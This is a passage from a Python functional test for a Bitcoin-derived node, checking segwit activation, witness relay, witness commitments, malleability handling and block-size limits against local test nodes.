        # Setup the p2p connections
        # self.test_node sets NODE_WITNESS|NODE_NETWORK
        self.test_node = self.nodes[0].add_p2p_connection(TestP2PConn(), services=NODE_NETWORK | NODE_WITNESS)
        # self.old_node sets only NODE_NETWORK
        self.old_node = self.nodes[0].add_p2p_connection(TestP2PConn(), services=NODE_NETWORK)
        # self.std_node is for testing node1 (fRequireStandard=true)
        self.std_node = self.nodes[1].add_p2p_connection(TestP2PConn(), services=NODE_NETWORK | NODE_WITNESS)
        # self.std_wtx_node is for testing node1 with wtxid relay
        self.std_wtx_node = self.nodes[1].add_p2p_connection(TestP2PConn(wtxidrelay=True), services=NODE_NETWORK | NODE_WITNESS)

        assert self.test_node.nServices & NODE_WITNESS != 0

        # Keep a place to store utxo's that can be used in later tests
        self.utxo = []

        self.log.info("Starting tests before segwit activation")
        self.segwit_active = False

        self.test_non_witness_transaction()
        self.test_v0_outputs_arent_spendable()
        self.test_block_relay()
        self.test_getblocktemplate_before_lockin()
        self.test_unnecessary_witness_before_segwit_activation()
        self.test_witness_tx_relay_before_segwit_activation()
        self.test_standardness_v0()

        self.log.info("Advancing to segwit activation")
        self.advance_to_segwit_active()

        # Segwit status 'active'

        self.test_p2sh_witness()
        self.test_witness_commitments()
        self.test_block_malleability()
        self.test_witness_block_size()
        self.test_submit_block()
        self.test_extra_witness_data()
        self.test_max_witness_push_length()
        self.test_max_witness_program_length()
        self.test_witness_input_length()
        self.test_block_relay()
        self.test_tx_relay_after_segwit_activation()
        self.test_standardness_v0()
        self.test_segwit_versions()
        self.test_premature_coinbase_witness_spend()
        self.test_uncompressed_pubkey()
        self.test_signature_version_1()
        self.test_non_standard_witness_blinding()
        self.test_non_standard_witness()
        self.test_upgrade_after_activation()
        self.test_witness_sigops()
        self.test_superfluous_witness()
        self.test_wtxid_relay()
# Individual tests
    def subtest(func):  # noqa: N805
        """Wraps the subtests for logging and state assertions."""
        # Used as a decorator at class-definition time, so `func` (not `self`)
        # is the first positional argument — hence the noqa above.
        def func_wrapper(self, *args, **kwargs):
            self.log.info("Subtest: {} (Segwit active = {})".format(func.__name__, self.segwit_active))
            # Assert segwit status is as expected
            assert_equal(softfork_active(self.nodes[0], 'segwit'), self.segwit_active)
            func(self, *args, **kwargs)
            # Each subtest should leave some utxos for the next subtest
            assert self.utxo
            self.sync_blocks()
            # Assert segwit status is as expected at end of subtest
            assert_equal(softfork_active(self.nodes[0], 'segwit'), self.segwit_active)

        return func_wrapper
    @subtest  # type: ignore
    def test_non_witness_transaction(self):
        """See if sending a regular transaction works, and create a utxo to use in later tests."""
        # Mine a block with an anyone-can-spend coinbase,
        # let it mature, then try to spend it.

        block = self.build_next_block(version=1)
        block.solve()
        self.test_node.send_and_ping(msg_no_witness_block(block))  # make sure the block was processed
        txid = block.vtx[0].sha256

        self.nodes[0].generate(99)  # let the block mature

        # Create a transaction that spends the coinbase
        tx = CTransaction()
        tx.vin.append(CTxIn(COutPoint(txid, 0), b""))
        # 15 TRUE/DROP pairs pad the scriptPubKey while keeping it anyone-can-spend.
        tx.vout.append(CTxOut(49 * 100000000, CScript([OP_TRUE, OP_DROP] * 15 + [OP_TRUE])))
        tx.calc_sha256()

        # Check that serializing it with or without witness is the same
        # This is a sanity check of our testing framework.
        assert_equal(msg_no_witness_tx(tx).serialize(), msg_tx(tx).serialize())

        self.test_node.send_and_ping(msg_tx(tx))  # make sure the tx was processed
        assert tx.hash in self.nodes[0].getrawmempool()
        # Save this transaction for later
        self.utxo.append(UTXO(tx.sha256, 0, 49 * 100000000))
        self.nodes[0].generate(1)
    @subtest  # type: ignore
    def test_unnecessary_witness_before_segwit_activation(self):
        """Verify that blocks with witnesses are rejected before activation."""

        tx = CTransaction()
        tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
        tx.vout.append(CTxOut(self.utxo[0].nValue - 1000, CScript([OP_TRUE])))
        # Attach a (useless) witness to a non-segwit spend.
        tx.wit.vtxinwit.append(CTxInWitness())
        tx.wit.vtxinwit[0].scriptWitness.stack = [CScript([CScriptNum(1)])]

        # Verify the hash with witness differs from the txid
        # (otherwise our testing framework must be broken!)
        tx.rehash()
        assert tx.sha256 != tx.calc_sha256(with_witness=True)

        # Construct a segwit-signaling block that includes the transaction.
        block = self.build_next_block(version=(VB_TOP_BITS | (1 << VB_WITNESS_BIT)))
        self.update_witness_block_with_transactions(block, [tx])
        # Sending witness data before activation is not allowed (anti-spam
        # rule).
        test_witness_block(self.nodes[0], self.test_node, block, accepted=False, reason='unexpected-witness')

        # But it should not be permanently marked bad...
        # Resend without witness information.
        self.test_node.send_and_ping(msg_no_witness_block(block))  # make sure the block was processed
        assert_equal(self.nodes[0].getbestblockhash(), block.hash)

        # Update our utxo list; we spent the first entry.
        self.utxo.pop(0)
        self.utxo.append(UTXO(tx.sha256, 0, tx.vout[0].nValue))
    @subtest  # type: ignore
    def test_block_relay(self):
        """Test that block requests to NODE_WITNESS peer are with MSG_WITNESS_FLAG.

        This is true regardless of segwit activation.

        Also test that we don't ask for blocks from unupgraded peers."""

        # getdata type for a witness block (2 is the plain block type; see
        # request_block(..., 2) below).
        blocktype = 2 | MSG_WITNESS_FLAG

        # test_node has set NODE_WITNESS, so all getdata requests should be for
        # witness blocks.
        # Test announcing a block via inv results in a getdata, and that
        # announcing a version 4 or random VB block with a header results in a getdata
        block1 = self.build_next_block()
        block1.solve()

        self.test_node.announce_block_and_wait_for_getdata(block1, use_header=False)
        assert self.test_node.last_message["getdata"].inv[0].type == blocktype
        test_witness_block(self.nodes[0], self.test_node, block1, True)

        block2 = self.build_next_block(version=4)
        block2.solve()

        self.test_node.announce_block_and_wait_for_getdata(block2, use_header=True)
        assert self.test_node.last_message["getdata"].inv[0].type == blocktype
        test_witness_block(self.nodes[0], self.test_node, block2, True)

        block3 = self.build_next_block(version=(VB_TOP_BITS | (1 << 15)))
        block3.solve()
        self.test_node.announce_block_and_wait_for_getdata(block3, use_header=True)
        assert self.test_node.last_message["getdata"].inv[0].type == blocktype
        test_witness_block(self.nodes[0], self.test_node, block3, True)

        # Check that we can getdata for witness blocks or regular blocks,
        # and the right thing happens.
        if not self.segwit_active:
            # Before activation, we should be able to request old blocks with
            # or without witness, and they should be the same.
            chain_height = self.nodes[0].getblockcount()
            # Pick 10 random blocks on main chain, and verify that getdata's
            # for MSG_BLOCK, MSG_WITNESS_BLOCK, and rpc getblock() are equal.
            all_heights = list(range(chain_height + 1))
            random.shuffle(all_heights)
            all_heights = all_heights[0:10]
            for height in all_heights:
                block_hash = self.nodes[0].getblockhash(height)
                rpc_block = self.nodes[0].getblock(block_hash, False)
                block_hash = int(block_hash, 16)
                block = self.test_node.request_block(block_hash, 2)
                wit_block = self.test_node.request_block(block_hash, 2 | MSG_WITNESS_FLAG)
                assert_equal(block.serialize(), wit_block.serialize())
                assert_equal(block.serialize(), hex_str_to_bytes(rpc_block))
        else:
            # After activation, witness blocks and non-witness blocks should
            # be different. Verify rpc getblock() returns witness blocks, while
            # getdata respects the requested type.
            block = self.build_next_block()
            self.update_witness_block_with_transactions(block, [])
            # This gives us a witness commitment.
            assert len(block.vtx[0].wit.vtxinwit) == 1
            assert len(block.vtx[0].wit.vtxinwit[0].scriptWitness.stack) == 1
            test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
            # Now try to retrieve it...
            rpc_block = self.nodes[0].getblock(block.hash, False)
            non_wit_block = self.test_node.request_block(block.sha256, 2)
            wit_block = self.test_node.request_block(block.sha256, 2 | MSG_WITNESS_FLAG)
            assert_equal(wit_block.serialize(), hex_str_to_bytes(rpc_block))
            assert_equal(wit_block.serialize(False), non_wit_block.serialize())
            assert_equal(wit_block.serialize(), block.serialize())

            # Test size, vsize, weight
            rpc_details = self.nodes[0].getblock(block.hash, True)
            assert_equal(rpc_details["size"], len(block.serialize()))
            assert_equal(rpc_details["strippedsize"], len(block.serialize(False)))
            # weight = 3 * stripped size + total size (BIP141 definition).
            weight = 3 * len(block.serialize(False)) + len(block.serialize())
            assert_equal(rpc_details["weight"], weight)

            # Upgraded node should not ask for blocks from unupgraded
            block4 = self.build_next_block(version=4)
            block4.solve()
            self.old_node.getdataset = set()

            # Blocks can be requested via direct-fetch (immediately upon processing the announcement)
            # or via parallel download (with an indeterminate delay from processing the announcement)
            # so to test that a block is NOT requested, we could guess a time period to sleep for,
            # and then check. We can avoid the sleep() by taking advantage of transaction getdata's
            # being processed after block getdata's, and announce a transaction as well,
            # and then check to see if that particular getdata has been received.
            # Since 0.14, inv's will only be responded to with a getheaders, so send a header
            # to announce this block.
            msg = msg_headers()
            msg.headers = [CBlockHeader(block4)]
            self.old_node.send_message(msg)
            self.old_node.announce_tx_and_wait_for_getdata(block4.vtx[0])
            assert block4.sha256 not in self.old_node.getdataset
    @subtest  # type: ignore
    def test_v0_outputs_arent_spendable(self):
        """Test that v0 outputs aren't spendable before segwit activation.

        ~6 months after segwit activation, the SCRIPT_VERIFY_WITNESS flag was
        backdated so that it applies to all blocks, going back to the genesis
        block.

        Consequently, version 0 witness outputs are never spendable without
        witness, and so can't be spent before segwit activation (the point at which
        blocks are permitted to contain witnesses)."""

        # node2 doesn't need to be connected for this test.
        # (If it's connected, node0 may propagate an invalid block to it over
        # compact blocks and the nodes would have inconsistent tips.)
        self.disconnect_nodes(0, 2)

        # Create two outputs, a p2wsh and p2sh-p2wsh
        witness_program = CScript([OP_TRUE])
        script_pubkey = script_to_p2wsh_script(witness_program)
        p2sh_script_pubkey = script_to_p2sh_script(script_pubkey)

        value = self.utxo[0].nValue // 3

        tx = CTransaction()
        tx.vin = [CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b'')]
        tx.vout = [CTxOut(value, script_pubkey), CTxOut(value, p2sh_script_pubkey)]
        # Third output is a plain anyone-can-spend, saved as the next test utxo.
        tx.vout.append(CTxOut(value, CScript([OP_TRUE])))
        tx.rehash()
        txid = tx.sha256

        # Add it to a block
        block = self.build_next_block()
        self.update_witness_block_with_transactions(block, [tx])
        # Verify that segwit isn't activated. A block serialized with witness
        # should be rejected prior to activation.
        test_witness_block(self.nodes[0], self.test_node, block, accepted=False, with_witness=True, reason='unexpected-witness')
        # Now send the block without witness. It should be accepted
        test_witness_block(self.nodes[0], self.test_node, block, accepted=True, with_witness=False)

        # Now try to spend the outputs. This should fail since SCRIPT_VERIFY_WITNESS is always enabled.
        p2wsh_tx = CTransaction()
        p2wsh_tx.vin = [CTxIn(COutPoint(txid, 0), b'')]
        p2wsh_tx.vout = [CTxOut(value, CScript([OP_TRUE]))]
        p2wsh_tx.wit.vtxinwit.append(CTxInWitness())
        p2wsh_tx.wit.vtxinwit[0].scriptWitness.stack = [CScript([OP_TRUE])]
        p2wsh_tx.rehash()

        p2sh_p2wsh_tx = CTransaction()
        p2sh_p2wsh_tx.vin = [CTxIn(COutPoint(txid, 1), CScript([script_pubkey]))]
        p2sh_p2wsh_tx.vout = [CTxOut(value, CScript([OP_TRUE]))]
        p2sh_p2wsh_tx.wit.vtxinwit.append(CTxInWitness())
        p2sh_p2wsh_tx.wit.vtxinwit[0].scriptWitness.stack = [CScript([OP_TRUE])]
        p2sh_p2wsh_tx.rehash()

        for tx in [p2wsh_tx, p2sh_p2wsh_tx]:

            block = self.build_next_block()
            self.update_witness_block_with_transactions(block, [tx])

            # When the block is serialized with a witness, the block will be rejected because witness
            # data isn't allowed in blocks that don't commit to witness data.
            test_witness_block(self.nodes[0], self.test_node, block, accepted=False, with_witness=True, reason='unexpected-witness')

            # When the block is serialized without witness, validation fails because the transaction is
            # invalid (transactions are always validated with SCRIPT_VERIFY_WITNESS so a segwit v0 transaction
            # without a witness is invalid).
            # Note: The reject reason for this failure could be
            # 'block-validation-failed' (if script check threads > 1) or
            # 'non-mandatory-script-verify-flag (Witness program was passed an
            # empty witness)' (otherwise).
            # TODO: support multiple acceptable reject reasons.
            test_witness_block(self.nodes[0], self.test_node, block, accepted=False, with_witness=False)

        self.connect_nodes(0, 2)

        self.utxo.pop(0)
        self.utxo.append(UTXO(txid, 2, value))
    @subtest  # type: ignore
    def test_getblocktemplate_before_lockin(self):
        """Check getblocktemplate's default witness commitment on segwit and non-segwit nodes."""
        txid = int(self.nodes[0].sendtoaddress(self.nodes[0].getnewaddress(), 1), 16)

        for node in [self.nodes[0], self.nodes[2]]:
            gbt_results = node.getblocktemplate({"rules": ["segwit"]})
            if node == self.nodes[2]:
                # If this is a non-segwit node, we should not get a witness
                # commitment.
                assert 'default_witness_commitment' not in gbt_results
            else:
                # For segwit-aware nodes, check the witness
                # commitment is correct.
                assert 'default_witness_commitment' in gbt_results
                witness_commitment = gbt_results['default_witness_commitment']

                # Check that default_witness_commitment is present.
                # Witness merkle root over [coinbase placeholder (0), txid].
                witness_root = CBlock.get_merkle_root([ser_uint256(0),
                                                       ser_uint256(txid)])
                script = get_witness_script(witness_root, 0)
                assert_equal(witness_commitment, script.hex())

        # Clear out the mempool
        self.nodes[0].generate(1)
        self.sync_blocks()
    @subtest  # type: ignore
    def test_witness_tx_relay_before_segwit_activation(self):
        """Verify witness-carrying txs are rejected (but not banned) pre-activation."""

        # Generate a transaction that doesn't require a witness, but send it
        # with a witness.  Should be rejected for premature-witness, but should
        # not be added to recently rejected list.
        tx = CTransaction()
        tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
        tx.vout.append(CTxOut(self.utxo[0].nValue - 1000, CScript([OP_TRUE, OP_DROP] * 15 + [OP_TRUE])))
        tx.wit.vtxinwit.append(CTxInWitness())
        tx.wit.vtxinwit[0].scriptWitness.stack = [b'a']
        tx.rehash()

        tx_hash = tx.sha256
        tx_value = tx.vout[0].nValue

        # Verify that if a peer doesn't set nServices to include NODE_WITNESS,
        # the getdata is just for the non-witness portion.
        self.old_node.announce_tx_and_wait_for_getdata(tx)
        assert self.old_node.last_message["getdata"].inv[0].type == MSG_TX

        # Since we haven't delivered the tx yet, inv'ing the same tx from
        # a witness transaction ought not result in a getdata.
        self.test_node.announce_tx_and_wait_for_getdata(tx, success=False)

        # Delivering this transaction with witness should fail (no matter who
        # its from)
        assert_equal(len(self.nodes[0].getrawmempool()), 0)
        assert_equal(len(self.nodes[1].getrawmempool()), 0)
        test_transaction_acceptance(self.nodes[0], self.old_node, tx, with_witness=True, accepted=False)
        test_transaction_acceptance(self.nodes[0], self.test_node, tx, with_witness=True, accepted=False)

        # But eliminating the witness should fix it
        test_transaction_acceptance(self.nodes[0], self.test_node, tx, with_witness=False, accepted=True)

        # Cleanup: mine the first transaction and update utxo
        self.nodes[0].generate(1)
        assert_equal(len(self.nodes[0].getrawmempool()), 0)

        self.utxo.pop(0)
        self.utxo.append(UTXO(tx_hash, 0, tx_value))
    @subtest  # type: ignore
    def test_standardness_v0(self):
        """Test V0 txout standardness.

        V0 segwit outputs and inputs are always standard.
        V0 segwit inputs may only be mined after activation, but not before."""
        witness_program = CScript([OP_TRUE])
        script_pubkey = script_to_p2wsh_script(witness_program)
        p2sh_script_pubkey = script_to_p2sh_script(witness_program)
        # First prepare a p2sh output (so that spending it will pass standardness)
        p2sh_tx = CTransaction()
        p2sh_tx.vin = [CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b"")]
        p2sh_tx.vout = [CTxOut(self.utxo[0].nValue - 1000, p2sh_script_pubkey)]
        p2sh_tx.rehash()
        # Mine it on test_node to create the confirmed output.
        test_transaction_acceptance(self.nodes[0], self.test_node, p2sh_tx, with_witness=True, accepted=True)
        self.nodes[0].generate(1)
        self.sync_blocks()
        # Now test standardness of v0 P2WSH outputs.
        # Start by creating a transaction with two outputs.
        tx = CTransaction()
        tx.vin = [CTxIn(COutPoint(p2sh_tx.sha256, 0), CScript([witness_program]))]
        tx.vout = [CTxOut(p2sh_tx.vout[0].nValue - 10000, script_pubkey)]
        tx.vout.append(CTxOut(8000, script_pubkey))  # Might burn this later
        tx.vin[0].nSequence = BIP125_SEQUENCE_NUMBER  # Just to have the option to bump this tx from the mempool
        tx.rehash()
        # This is always accepted, since the mempool policy is to consider segwit as always active
        # and thus allow segwit outputs
        test_transaction_acceptance(self.nodes[1], self.std_node, tx, with_witness=True, accepted=True)
        # Now create something that looks like a P2PKH output. This won't be spendable.
        # (OP_0 followed by a 20-byte push is interpreted as a P2WPKH program,
        # but the hash here does not correspond to any key we hold.)
        witness_hash = sha256(witness_program)
        script_pubkey = CScript([OP_0, hash160(witness_hash)])
        tx2 = CTransaction()
        # tx was accepted, so we spend the second output.
        tx2.vin = [CTxIn(COutPoint(tx.sha256, 1), b"")]
        tx2.vout = [CTxOut(7000, script_pubkey)]
        tx2.wit.vtxinwit.append(CTxInWitness())
        tx2.wit.vtxinwit[0].scriptWitness.stack = [witness_program]
        tx2.rehash()
        test_transaction_acceptance(self.nodes[1], self.std_node, tx2, with_witness=True, accepted=True)
        # Now update self.utxo for later tests.
        tx3 = CTransaction()
        # tx and tx2 were both accepted. Don't bother trying to reclaim the
        # P2PKH output; just send tx's first output back to an anyone-can-spend.
        self.sync_mempools([self.nodes[0], self.nodes[1]])
        tx3.vin = [CTxIn(COutPoint(tx.sha256, 0), b"")]
        tx3.vout = [CTxOut(tx.vout[0].nValue - 1000, CScript([OP_TRUE, OP_DROP] * 15 + [OP_TRUE]))]
        tx3.wit.vtxinwit.append(CTxInWitness())
        tx3.wit.vtxinwit[0].scriptWitness.stack = [witness_program]
        tx3.rehash()
        if not self.segwit_active:
            # Just check mempool acceptance, but don't add the transaction to the mempool, since witness is disallowed
            # in blocks and the tx is impossible to mine right now.
            assert_equal(
                self.nodes[0].testmempoolaccept([tx3.serialize_with_witness().hex()]),
                [{
                    'txid': tx3.hash,
                    'wtxid': tx3.getwtxid(),
                    'allowed': True,
                    'vsize': tx3.get_vsize(),
                    'fees': {
                        'base': Decimal('0.00001000'),
                    },
                }],
            )
            # Create the same output as tx3, but by replacing tx
            tx3_out = tx3.vout[0]
            tx3 = tx
            tx3.vout = [tx3_out]
            tx3.rehash()
            assert_equal(
                self.nodes[0].testmempoolaccept([tx3.serialize_with_witness().hex()]),
                [{
                    'txid': tx3.hash,
                    'wtxid': tx3.getwtxid(),
                    'allowed': True,
                    'vsize': tx3.get_vsize(),
                    'fees': {
                        'base': Decimal('0.00011000'),
                    },
                }],
            )
        test_transaction_acceptance(self.nodes[0], self.test_node, tx3, with_witness=True, accepted=True)
        self.nodes[0].generate(1)
        self.sync_blocks()
        self.utxo.pop(0)
        self.utxo.append(UTXO(tx3.sha256, 0, tx3.vout[0].nValue))
        assert_equal(len(self.nodes[1].getrawmempool()), 0)
    @subtest  # type: ignore
    def advance_to_segwit_active(self):
        """Mine enough blocks to activate segwit.

        Checks the softfork is inactive both before mining and at one block
        short of SEGWIT_HEIGHT, then mines the final block and records
        activation in self.segwit_active for later subtests."""
        assert not softfork_active(self.nodes[0], 'segwit')
        height = self.nodes[0].getblockcount()
        # Mine up to (but not including) the activation height.
        self.nodes[0].generate(SEGWIT_HEIGHT - height - 2)
        assert not softfork_active(self.nodes[0], 'segwit')
        self.nodes[0].generate(1)
        assert softfork_active(self.nodes[0], 'segwit')
        self.segwit_active = True
    @subtest  # type: ignore
    def test_p2sh_witness(self):
        """Test P2SH wrapped witness programs.

        Funds a P2SH(P2WSH) output, then verifies that:
        - spending it with no witness fails (empty witness),
        - putting the witness script in the scriptSig fails,
        - supplying the proper witness succeeds in mempool and block."""
        # Prepare the p2sh-wrapped witness output
        witness_program = CScript([OP_DROP, OP_TRUE])
        p2wsh_pubkey = script_to_p2wsh_script(witness_program)
        script_pubkey = script_to_p2sh_script(p2wsh_pubkey)
        script_sig = CScript([p2wsh_pubkey])  # a push of the redeem script
        # Fund the P2SH output
        tx = CTransaction()
        tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
        tx.vout.append(CTxOut(self.utxo[0].nValue - 1000, script_pubkey))
        tx.rehash()
        # Verify mempool acceptance and block validity
        test_transaction_acceptance(self.nodes[0], self.test_node, tx, with_witness=False, accepted=True)
        block = self.build_next_block()
        self.update_witness_block_with_transactions(block, [tx])
        test_witness_block(self.nodes[0], self.test_node, block, accepted=True, with_witness=True)
        self.sync_blocks()
        # Now test attempts to spend the output.
        spend_tx = CTransaction()
        spend_tx.vin.append(CTxIn(COutPoint(tx.sha256, 0), script_sig))
        spend_tx.vout.append(CTxOut(tx.vout[0].nValue - 1000, CScript([OP_TRUE])))
        spend_tx.rehash()
        # This transaction should not be accepted into the mempool pre- or
        # post-segwit. Mempool acceptance will use SCRIPT_VERIFY_WITNESS which
        # will require a witness to spend a witness program regardless of
        # segwit activation. Note that older ocvcoind's that are not
        # segwit-aware would also reject this for failing CLEANSTACK.
        with self.nodes[0].assert_debug_log(
                expected_msgs=(spend_tx.hash, 'was not accepted: non-mandatory-script-verify-flag (Witness program was passed an empty witness)')):
            test_transaction_acceptance(self.nodes[0], self.test_node, spend_tx, with_witness=False, accepted=False)
        # Try to put the witness script in the scriptSig, should also fail.
        spend_tx.vin[0].scriptSig = CScript([p2wsh_pubkey, b'a'])
        spend_tx.rehash()
        with self.nodes[0].assert_debug_log(
                expected_msgs=(spend_tx.hash, 'was not accepted: mandatory-script-verify-flag-failed (Script evaluated without error but finished with a false/empty top stack element)')):
            test_transaction_acceptance(self.nodes[0], self.test_node, spend_tx, with_witness=False, accepted=False)
        # Now put the witness script in the witness, should succeed after
        # segwit activates.
        spend_tx.vin[0].scriptSig = script_sig
        spend_tx.rehash()
        spend_tx.wit.vtxinwit.append(CTxInWitness())
        spend_tx.wit.vtxinwit[0].scriptWitness.stack = [b'a', witness_program]
        # Verify mempool acceptance
        test_transaction_acceptance(self.nodes[0], self.test_node, spend_tx, with_witness=True, accepted=True)
        block = self.build_next_block()
        self.update_witness_block_with_transactions(block, [spend_tx])
        # If we're after activation, then sending this with witnesses should be valid.
        # This no longer works before activation, because SCRIPT_VERIFY_WITNESS
        # is always set.
        # TODO: rewrite this test to make clear that it only works after activation.
        test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
        # Update self.utxo
        self.utxo.pop(0)
        self.utxo.append(UTXO(spend_tx.sha256, 0, spend_tx.vout[0].nValue))
    @subtest  # type: ignore
    def test_witness_commitments(self):
        """Test witness commitments.

        This test can only be run after segwit has activated.
        Covers: a correct (empty-block) commitment, nonce malleation,
        an incorrect commitment with trailing data (must fail), a burned
        but well-placed commitment (must succeed), and a block with no
        witness txs that legitimately omits the commitment."""
        # First try a correct witness commitment.
        block = self.build_next_block()
        add_witness_commitment(block)
        block.solve()
        # Test the test -- witness serialization should be different
        assert msg_block(block).serialize() != msg_no_witness_block(block).serialize()
        # This empty block should be valid.
        test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
        # Try to tweak the nonce
        block_2 = self.build_next_block()
        add_witness_commitment(block_2, nonce=28)
        block_2.solve()
        # The commitment should have changed!
        assert block_2.vtx[0].vout[-1] != block.vtx[0].vout[-1]
        # This should also be valid.
        test_witness_block(self.nodes[0], self.test_node, block_2, accepted=True)
        # Now test commitments with actual transactions
        tx = CTransaction()
        tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
        # Let's construct a witness program
        witness_program = CScript([OP_TRUE])
        script_pubkey = script_to_p2wsh_script(witness_program)
        tx.vout.append(CTxOut(self.utxo[0].nValue - 1000, script_pubkey))
        tx.rehash()
        # tx2 will spend tx1, and send back to a regular anyone-can-spend address
        tx2 = CTransaction()
        tx2.vin.append(CTxIn(COutPoint(tx.sha256, 0), b""))
        tx2.vout.append(CTxOut(tx.vout[0].nValue - 1000, witness_program))
        tx2.wit.vtxinwit.append(CTxInWitness())
        tx2.wit.vtxinwit[0].scriptWitness.stack = [witness_program]
        tx2.rehash()
        block_3 = self.build_next_block()
        self.update_witness_block_with_transactions(block_3, [tx, tx2], nonce=1)
        # Add an extra OP_RETURN output that matches the witness commitment template,
        # even though it has extra data after the incorrect commitment.
        # This block should fail.
        block_3.vtx[0].vout.append(CTxOut(0, CScript([OP_RETURN, WITNESS_COMMITMENT_HEADER + ser_uint256(2), 10])))
        block_3.vtx[0].rehash()
        block_3.hashMerkleRoot = block_3.calc_merkle_root()
        block_3.rehash()
        block_3.solve()
        test_witness_block(self.nodes[0], self.test_node, block_3, accepted=False)
        # Add a different commitment with different nonce, but in the
        # right location, and with some funds burned(!).
        # This should succeed (nValue shouldn't affect finding the
        # witness commitment).
        add_witness_commitment(block_3, nonce=0)
        block_3.vtx[0].vout[0].nValue -= 1
        block_3.vtx[0].vout[-1].nValue += 1
        block_3.vtx[0].rehash()
        block_3.hashMerkleRoot = block_3.calc_merkle_root()
        block_3.rehash()
        assert len(block_3.vtx[0].vout) == 4  # 3 OP_returns
        block_3.solve()
        test_witness_block(self.nodes[0], self.test_node, block_3, accepted=True)
        # Finally test that a block with no witness transactions can
        # omit the commitment.
        block_4 = self.build_next_block()
        tx3 = CTransaction()
        tx3.vin.append(CTxIn(COutPoint(tx2.sha256, 0), b""))
        tx3.vout.append(CTxOut(tx.vout[0].nValue - 1000, witness_program))
        tx3.rehash()
        block_4.vtx.append(tx3)
        block_4.hashMerkleRoot = block_4.calc_merkle_root()
        block_4.solve()
        test_witness_block(self.nodes[0], self.test_node, block_4, with_witness=False, accepted=True)
        # Update available utxo's for use in later test.
        self.utxo.pop(0)
        self.utxo.append(UTXO(tx3.sha256, 0, tx3.vout[0].nValue))
    @subtest  # type: ignore
    def test_block_malleability(self):
        """Test that witness malleation cannot permanently invalidate a block.

        Oversizing the coinbase witness, or tweaking the witness reserved
        value, must cause rejection without the block hash being marked
        permanently bad — the corrected block is accepted afterwards."""
        # Make sure that a block that has too big a virtual size
        # because of a too-large coinbase witness is not permanently
        # marked bad.
        block = self.build_next_block()
        add_witness_commitment(block)
        block.solve()
        block.vtx[0].wit.vtxinwit[0].scriptWitness.stack.append(b'a' * 5000000)
        assert get_virtual_size(block) > MAX_BLOCK_BASE_SIZE
        # We can't send over the p2p network, because this is too big to relay
        # TODO: repeat this test with a block that can be relayed
        assert_equal('bad-witness-nonce-size', self.nodes[0].submitblock(block.serialize().hex()))
        assert self.nodes[0].getbestblockhash() != block.hash
        block.vtx[0].wit.vtxinwit[0].scriptWitness.stack.pop()
        assert get_virtual_size(block) < MAX_BLOCK_BASE_SIZE
        assert_equal(None, self.nodes[0].submitblock(block.serialize().hex()))
        assert self.nodes[0].getbestblockhash() == block.hash
        # Now make sure that malleating the witness reserved value doesn't
        # result in a block permanently marked bad.
        block = self.build_next_block()
        add_witness_commitment(block)
        block.solve()
        # Change the nonce -- should not cause the block to be permanently
        # failed
        block.vtx[0].wit.vtxinwit[0].scriptWitness.stack = [ser_uint256(1)]
        test_witness_block(self.nodes[0], self.test_node, block, accepted=False)
        # Changing the witness reserved value doesn't change the block hash
        block.vtx[0].wit.vtxinwit[0].scriptWitness.stack = [ser_uint256(0)]
        test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
    @subtest  # type: ignore
    def test_witness_block_size(self):
        """Test the virtual-size limit for witness-bearing blocks.

        Builds a block whose witness data pushes the virtual size to exactly
        MAX_BLOCK_BASE_SIZE + 1 (rejected), then trims one byte so vsize ==
        MAX_BLOCK_BASE_SIZE (accepted)."""
        # TODO: Test that non-witness carrying blocks can't exceed 1MB
        # Skipping this test for now; this is covered in p2p-fullblocktest.py
        # Test that witness-bearing blocks are limited at ceil(base + wit/4) <= 1MB.
        block = self.build_next_block()
        assert len(self.utxo) > 0
        # Create a P2WSH transaction.
        # The witness program will be a bunch of OP_2DROP's, followed by OP_TRUE.
        # This should give us plenty of room to tweak the spending tx's
        # virtual size.
        NUM_DROPS = 200  # 201 max ops per script!
        NUM_OUTPUTS = 50
        witness_program = CScript([OP_2DROP] * NUM_DROPS + [OP_TRUE])
        script_pubkey = script_to_p2wsh_script(witness_program)
        prevout = COutPoint(self.utxo[0].sha256, self.utxo[0].n)
        value = self.utxo[0].nValue
        parent_tx = CTransaction()
        parent_tx.vin.append(CTxIn(prevout, b""))
        child_value = int(value / NUM_OUTPUTS)
        for _ in range(NUM_OUTPUTS):
            parent_tx.vout.append(CTxOut(child_value, script_pubkey))
        parent_tx.vout[0].nValue -= 50000  # leave a fee
        assert parent_tx.vout[0].nValue > 0
        parent_tx.rehash()
        child_tx = CTransaction()
        for i in range(NUM_OUTPUTS):
            child_tx.vin.append(CTxIn(COutPoint(parent_tx.sha256, i), b""))
        child_tx.vout = [CTxOut(value - 100000, CScript([OP_TRUE]))]
        # Each input's witness: two stack items per OP_2DROP, plus the program.
        for _ in range(NUM_OUTPUTS):
            child_tx.wit.vtxinwit.append(CTxInWitness())
            child_tx.wit.vtxinwit[-1].scriptWitness.stack = [b'a' * 195] * (2 * NUM_DROPS) + [witness_program]
        child_tx.rehash()
        self.update_witness_block_with_transactions(block, [parent_tx, child_tx])
        vsize = get_virtual_size(block)
        additional_bytes = (MAX_BLOCK_BASE_SIZE - vsize) * 4
        i = 0
        while additional_bytes > 0:
            # Add some more bytes to each input until we hit MAX_BLOCK_BASE_SIZE+1
            extra_bytes = min(additional_bytes + 1, 55)
            block.vtx[-1].wit.vtxinwit[int(i / (2 * NUM_DROPS))].scriptWitness.stack[i % (2 * NUM_DROPS)] = b'a' * (195 + extra_bytes)
            additional_bytes -= extra_bytes
            i += 1
        block.vtx[0].vout.pop()  # Remove old commitment
        add_witness_commitment(block)
        block.solve()
        vsize = get_virtual_size(block)
        assert_equal(vsize, MAX_BLOCK_BASE_SIZE + 1)
        # Make sure that our test case would exceed the old max-network-message
        # limit
        assert len(block.serialize()) > 2 * 1024 * 1024
        test_witness_block(self.nodes[0], self.test_node, block, accepted=False)
        # Now resize the second transaction to make the block fit.
